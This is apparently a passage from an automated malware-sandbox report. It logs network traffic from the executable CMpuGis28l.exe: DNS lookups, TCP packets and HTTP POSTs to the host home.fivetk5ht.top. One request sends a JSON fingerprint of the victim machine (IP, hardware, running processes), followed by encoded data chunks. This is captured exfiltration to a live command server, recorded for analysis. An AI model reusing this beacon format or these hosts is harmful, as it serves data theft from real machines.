Dec 20, 2024 16:20:14.309664965 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.309674025 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.309678078 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.309681892 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.309685946 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.309689045 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.309700012 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.309704065 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.309708118 CET | 49711 | 80 | 192.168.2.12 | 185.121.15.192
Dec 20, 2024 16:20:14.309719086 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.309731007 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.309741020 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.309750080 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.309792995 CET | 49711 | 80 | 192.168.2.12 | 185.121.15.192
Dec 20, 2024 16:20:14.311284065 CET | 49711 | 80 | 192.168.2.12 | 185.121.15.192
Dec 20, 2024 16:20:14.429914951 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.429930925 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.429996014 CET | 49711 | 80 | 192.168.2.12 | 185.121.15.192
Dec 20, 2024 16:20:14.430049896 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.430102110 CET | 49711 | 80 | 192.168.2.12 | 185.121.15.192
Dec 20, 2024 16:20:14.430545092 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.430557013 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.430602074 CET | 49711 | 80 | 192.168.2.12 | 185.121.15.192
Dec 20, 2024 16:20:14.430691957 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.430702925 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.430711985 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.430721998 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.431005001 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.431015015 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.431693077 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.431814909 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.431824923 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.432003021 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.432013035 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.432022095 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.432112932 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.432125092 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.432260036 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.432270050 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.432400942 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.432673931 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.432683945 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.432858944 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.432871103 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.432881117 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.432889938 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.432898998 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.432985067 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.432995081 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.433003902 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.433150053 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.433160067 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.433170080 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.433497906 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.433507919 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.433516979 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.433526993 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.433708906 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.433718920 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.433728933 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.433737993 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.433748960 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.433799028 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.433809996 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.433814049 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.433823109 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.433831930 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.433841944 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.433851004 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.434246063 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.434256077 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.434264898 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.434276104 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.434573889 CET | 49711 | 80 | 192.168.2.12 | 185.121.15.192
Dec 20, 2024 16:20:14.434633970 CET | 49711 | 80 | 192.168.2.12 | 185.121.15.192
Dec 20, 2024 16:20:14.473885059 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.474864960 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.474915028 CET | 49711 | 80 | 192.168.2.12 | 185.121.15.192
Dec 20, 2024 16:20:14.475276947 CET | 49711 | 80 | 192.168.2.12 | 185.121.15.192
Dec 20, 2024 16:20:14.549712896 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.549773932 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.549784899 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.549896002 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.549906969 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.549916983 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.550102949 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.550209045 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.550219059 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.554156065 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.554331064 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.554385900 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.554395914 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.554404974 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.554487944 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.554498911 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.554620981 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.554703951 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.554713964 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.554724932 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.554766893 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.554872990 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.554915905 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.554928064 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.555038929 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.555056095 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.555191994 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.555205107 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.555213928 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.555290937 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.555444956 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.555454969 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.555459976 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.555629015 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.555706978 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.555922985 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.555933952 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.555977106 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.556134939 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.556281090 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.556292057 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.556361914 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.556536913 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.556616068 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.556632042 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.556642056 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.556759119 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.556770086 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.556906939 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.556917906 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.557005882 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.557017088 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.557059050 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.557069063 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.557076931 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.557379007 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.557389975 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.557399035 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.557408094 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.557419062 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.557435036 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.557445049 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.557455063 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.594463110 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.594675064 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:15.205106974 CET | 49712 | 80 | 192.168.2.12 | 185.121.15.192
Dec 20, 2024 16:20:15.325505972 CET | 80 | 49712 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:15.325623989 CET | 49712 | 80 | 192.168.2.12 | 185.121.15.192
Dec 20, 2024 16:20:15.325867891 CET | 49712 | 80 | 192.168.2.12 | 185.121.15.192
Dec 20, 2024 16:20:15.445679903 CET | 80 | 49712 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:16.608032942 CET | 80 | 49712 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:16.608167887 CET | 80 | 49712 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:16.608238935 CET | 49712 | 80 | 192.168.2.12 | 185.121.15.192
Dec 20, 2024 16:20:16.608419895 CET | 49712 | 80 | 192.168.2.12 | 185.121.15.192
Dec 20, 2024 16:20:16.727943897 CET | 80 | 49712 | 185.121.15.192 | 192.168.2.12
                                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                      Dec 20, 2024 16:20:09.419254065 CET | 61172 | 53 | 192.168.2.12 | 1.1.1.1
                                                      Dec 20, 2024 16:20:09.419388056 CET | 61172 | 53 | 192.168.2.12 | 1.1.1.1
                                                      Dec 20, 2024 16:20:09.556961060 CET | 53 | 61172 | 1.1.1.1 | 192.168.2.12
                                                      Dec 20, 2024 16:20:09.712722063 CET | 53 | 61172 | 1.1.1.1 | 192.168.2.12
                                                      Dec 20, 2024 16:20:12.908492088 CET | 61175 | 53 | 192.168.2.12 | 1.1.1.1
                                                      Dec 20, 2024 16:20:12.908627033 CET | 61175 | 53 | 192.168.2.12 | 1.1.1.1
                                                      Dec 20, 2024 16:20:13.046479940 CET | 53 | 61175 | 1.1.1.1 | 192.168.2.12
                                                      Dec 20, 2024 16:20:13.047024965 CET | 53 | 61175 | 1.1.1.1 | 192.168.2.12
                                                      Dec 20, 2024 16:20:15.066340923 CET | 61177 | 53 | 192.168.2.12 | 1.1.1.1
                                                      Dec 20, 2024 16:20:15.066437960 CET | 61177 | 53 | 192.168.2.12 | 1.1.1.1
                                                      Dec 20, 2024 16:20:15.204268932 CET | 53 | 61177 | 1.1.1.1 | 192.168.2.12
                                                      Dec 20, 2024 16:20:15.204538107 CET | 53 | 61177 | 1.1.1.1 | 192.168.2.12
                                                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                      Dec 20, 2024 16:20:09.419254065 CET | 192.168.2.12 | 1.1.1.1 | 0x49c5 | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false
                                                      Dec 20, 2024 16:20:09.419388056 CET | 192.168.2.12 | 1.1.1.1 | 0xf230 | Standard query (0) | httpbin.org | 28 | IN (0x0001) | false
                                                      Dec 20, 2024 16:20:12.908492088 CET | 192.168.2.12 | 1.1.1.1 | 0x3d83 | Standard query (0) | home.fivetk5ht.top | A (IP address) | IN (0x0001) | false
                                                      Dec 20, 2024 16:20:12.908627033 CET | 192.168.2.12 | 1.1.1.1 | 0xf617 | Standard query (0) | home.fivetk5ht.top | 28 | IN (0x0001) | false
                                                      Dec 20, 2024 16:20:15.066340923 CET | 192.168.2.12 | 1.1.1.1 | 0x5145 | Standard query (0) | home.fivetk5ht.top | A (IP address) | IN (0x0001) | false
                                                      Dec 20, 2024 16:20:15.066437960 CET | 192.168.2.12 | 1.1.1.1 | 0x29b2 | Standard query (0) | home.fivetk5ht.top | 28 | IN (0x0001) | false
                                                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                      Dec 20, 2024 16:20:09.556961060 CET | 1.1.1.1 | 192.168.2.12 | 0x49c5 | No error (0) | httpbin.org |  | 98.85.100.80 | A (IP address) | IN (0x0001) | false
                                                      Dec 20, 2024 16:20:09.556961060 CET | 1.1.1.1 | 192.168.2.12 | 0x49c5 | No error (0) | httpbin.org |  | 34.226.108.155 | A (IP address) | IN (0x0001) | false
                                                      Dec 20, 2024 16:20:13.046479940 CET | 1.1.1.1 | 192.168.2.12 | 0x3d83 | No error (0) | home.fivetk5ht.top |  | 185.121.15.192 | A (IP address) | IN (0x0001) | false
                                                      Dec 20, 2024 16:20:15.204268932 CET | 1.1.1.1 | 192.168.2.12 | 0x5145 | No error (0) | home.fivetk5ht.top |  | 185.121.15.192 | A (IP address) | IN (0x0001) | false
                                                      • httpbin.org
                                                      • home.fivetk5ht.top
                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      0 | 192.168.2.12 | 49711 | 185.121.15.192 | 80 | 7012 | C:\Users\user\Desktop\CMpuGis28l.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 20, 2024 16:20:13.176632881 CET | 12360 | OUT | POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1
                                                      Host: home.fivetk5ht.top
                                                      Accept: */*
                                                      Content-Type: application/json
                                                      Content-Length: 499685
                                                      Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 38 30 31 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                      Data Ascii: { "ip": "8.46.123.189", "current_time": "1734708011", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 336 }, { "name": "csrss.exe", "pid": 420 }, { "name": "wininit.exe", "pid": 496 }, { "name": "csrss.exe", "pid": 504 }, { "name": "winlogon.exe", "pid": 580 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 760 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "fontdrvhost.exe", "pid": 792 }, { "name": "svchost.exe", "pid": 876 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 372 }, { "name": "svchost.exe", "pid": 404 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                                      Dec 20, 2024 16:20:13.296833992 CET | 4944 | OUT | Data Raw: 34 71 31 63 4c 44 45 59 61 62 70 31 71 61 78 64 4c 67 65 65 46 6e 79 54 56 6e 4b 6e 56 6c 42 70 71 55 5a 4f 4d 6b 33 5c 2f 58 64 44 36 42 5c 2f 30 72 73 54 54 6f 56 61 50 68 56 4b 63 4d 54 51 70 59 6d 69 6e 78 74 34 63 77 71 54 6f 31 34 52 6e 53
                                                      Data Ascii: 4q1cLDEYabp1qaxdLgeeFnyTVnKnVlBpqUZOMk3\/XdD6B\/0rsTToVaPhVKcMTQpYminxt4cwqTo14RnSn7GfF8a0eeMk+WcIyV7Simmj8hKK\/X63\/4JOeILgkf8Ls0VCDgg+CL4kMP4T\/xUowcYPODyK\/MH4l+Cbn4a\/EPxt8Pru\/g1S58F+KNb8MzalbRSQQX76PqE9ibyKCVnkgS48kSiF3kMW7y\/Mk272\/RfB7
                                                      Dec 20, 2024 16:20:13.296952963 CET | 4944 | OUT | Data Raw: 42 46 5c 2f 77 41 5c 2f 55 31 44 75 65 52 66 6b 5c 2f 64 63 43 4c 79 78 2b 5c 2f 77 44 5c 2f 41 4f 43 5c 2f 7a 31 6f 4e 52 6a 62 50 6e 52 33 5c 2f 41 48 50 39 50 58 33 39 50 38 35 6f 5c 2f 69 32 66 75 5c 2f 33 6e 2b 71 5c 2f 65 2b 6e 2b 66 31 37
                                                      Data Ascii: BF\/wA\/U1DueRfk\/dcCLyx+\/wD\/AOC\/z1oNRjbPnR3\/AHP9PX39P85o\/i2fu\/3n+q\/e+n+f171JJ+72bJt7+b5ssn\/PH8u\/5YpPLj\/j+d\/+WUkn+v8A8\/yoOgD\/AAPv2eXF+6k\/0X+Xr2NVlkKsjv8A9O\/vP\/x9fXr9Ks+W7fx+ckn\/AC06fTOOKa8fzbEfzkEvf\/lj\/wDq\/wDr\/UAjEj+Y+\/zD
                                                      Dec 20, 2024 16:20:13.296973944 CET | 4944 | OUT | Data Raw: 4b 65 45 50 32 67 50 32 74 5c 2f 47 58 77 59 38 53 36 54 59 2b 44 76 68 6e 34 7a 31 4f 33 30 66 39 6e 50 78 4c 65 72 4a 5a 61 74 71 4f 71 36 63 6a 57 7a 61 58 34 34 65 34 75 48 74 59 4e 51 2b 49 55 69 74 71 58 68 65 43 42 4c 54 2b 79 62 5c 2f 41
                                                      Data Ascii: KeEP2gP2t\/GXwY8S6TY+Dvhn4z1O30f9nPxLerJZatqOq6cjWzaX44e4uHtYNQ+IUitqXheCBLT+yb\/AOx+Dp21nUtRtr9v1d8G\/tDfCD4g\/FP4n\/Bbwh4003WfiT8HhozePfDkHmrNpY1yDzoGt53RbbVBYO0dlrh06W5GhanPb6ZqptL2eKBv5w4u4K4m4Ixs8BxH4X5bhK1HJMBxFiJU58X4nD4bK8fUw2FhXxOIocT
                                                      Dec 20, 2024 16:20:13.297326088 CET | 7416 | OUT | Data Raw: 4c 48 62 51 33 75 6b 58 73 64 75 37 6d 53 61 43 50 62 5c 2f 61 43 32 51 59 53 53 48 49 79 45 55 79 2b 58 6a 39 75 64 43 68 2b 48 58 69 71 79 65 4b 30 31 48 53 5c 2f 46 46 74 66 32 73 6b 63 39 6a 63 79 77 7a 52 58 56 6e 63 78 4e 48 4e 48 50 70 55
                                                      Data Ascii: LHbQ3ukXsdu7mSaCPb\/aC2QYSSHIyEUy+Xj9udCh+HXiqyeK01HS\/FFtf2skc9jcywzRXVncxNHNHPpUwVp7S4hZ45Y7iGaCWMurblyK\/gz6SPHdLw940q4HNMqjnXD\/F2XcMZzjMBUoYyHtMTkWZYmhUjgswo4jDUcLi6+FwNPC4rnlXl9Uq0pSoaUZH+nv0P+Aa\/if4bvHZRmscj4o4Mzbi7IMDmsK+CqVMLg+IcswOM
                                                      Dec 20, 2024 16:20:13.297348022 CET | 2472 | OUT | Data Raw: 39 5c 2f 36 2b 76 72 54 50 38 41 67 63 61 66 38 74 66 74 48 72 33 39 76 54 5c 2f 4f 65 58 78 37 50 4d 7a 76 32 52 38 66 39 4e 36 5a 39 37 2b 50 59 5c 2f 6d 6d 4c 5c 2f 56 66 36 37 5c 2f 50 36 35 39 2b 51 36 42 6b 6d 5c 2f 35 4e 6a 78 76 2b 39 5c
                                                      Data Ascii: 9\/6+vrTP8Agcaf8tftHr39vT\/OeXx7PMzv2R8f9N6Z97+PY\/mmL\/Vf67\/P659+Q6Bkm\/5Njxv+9\/56\/l+HTpTPusn8f+xJ+XantseObf5ieZ\/2wx\/n\/wCvkU+P956o\/wDyyjkix\/n8fegCnJ\/eT6+V+Zx\/Lp+XepPMQSf6nyZp\/wB7n\/Xcdf8ARMZ\/zx6U7dtkTZNG6fn\/AI5\/pioVkMfnM6SfvP8An
                                                      Dec 20, 2024 16:20:13.416692972 CET | 4944 | OUT | Data Raw: 68 6e 2b 79 46 38 51 4c 44 77 4a 34 6c 2b 4a 6f 66 34 51 66 47 72 34 76 33 32 6f 36 66 38 50 64 4c 2b 49 30 58 6a 6e 34 4e 2b 42 37 6b 36 42 34 69 75 39 44 38 51 32 39 6e 34 70 38 41 77 65 50 4e 45 61 38 38 4f 36 74 59 43 37 4f 6f 43 77 74 62 5c
                                                      Data Ascii: hn+yF8QLDwJ4l+Jof4QfGr4v32o6f8PdL+I0Xjn4N+B7k6B4iu9D8Q29n4p8AwePNEa88O6tYC7OoCwtb\/AMp8L6xpfiyX4UJp\/iLwX9h+MPwu1j4y+GvEUusa7H4X0z4e+E9Q+I9h4\/1\/xJqc\/hKC9tLf4df8Km8e3fjB9I0rXIrSy0G4m0yXVi8KSfleD8b\/AAjx8HUwvHuR1IRo1cRJzqV6HLQo5VPPZ1ZKvRpNQlk
                                                      Dec 20, 2024 16:20:13.417248964 CET | 4944 | OUT | Data Raw: 70 4c 74 38 4c 66 67 53 50 72 70 50 78 45 50 38 41 4c 34 6a 4c 58 35 47 51 61 50 34 63 74 57 2b 4b 68 38 61 66 48 48 34 41 66 44 65 32 2b 43 57 70 5c 2f 43 50 77 6c 38 55 72 72 78 4e 72 66 78 70 38 52 52 2b 44 5c 2f 69 6a 38 59 72 62 78 37 64 61
                                                      Data Ascii: pLt8LfgSPrpPxEP8AL4jLX5GQaP4ctW+Kh8afHH4AfDe2+CWp\/CPwl8UrrxNrfxp8RR+D\/ij8Yrbx7daP8Ib1fhN8BPiW99498MJ8OfEMHjhtFXVPB+gakItEXxdfa5a61pmkZ1hpuj6l4I8J+KLP4s\/Ba68UfEP4b\/HT4u\/DX4Qw6p8Yx8SviH8PP2d9U+JGn\/EjxB4dmuvgZa\/DS0e3s\/hP4317SND8VfEjw34j1T
                                                      Dec 20, 2024 16:20:13.417380095 CET | 4944 | OUT | Data Raw: 38 38 74 30 32 66 38 73 76 33 73 6e 6d 5c 2f 77 44 6b 72 5c 2f 6e 36 30 6b 61 5c 2f 63 32 4c 73 63 79 35 38 75 54 6a 5c 2f 41 43 61 46 2b 5a 64 6d 2b 50 38 41 36 5a 65 5a 31 5c 2f 55 66 38 65 4e 61 65 30 38 76 78 5c 2f 34 41 48 36 5c 2f 66 48 72
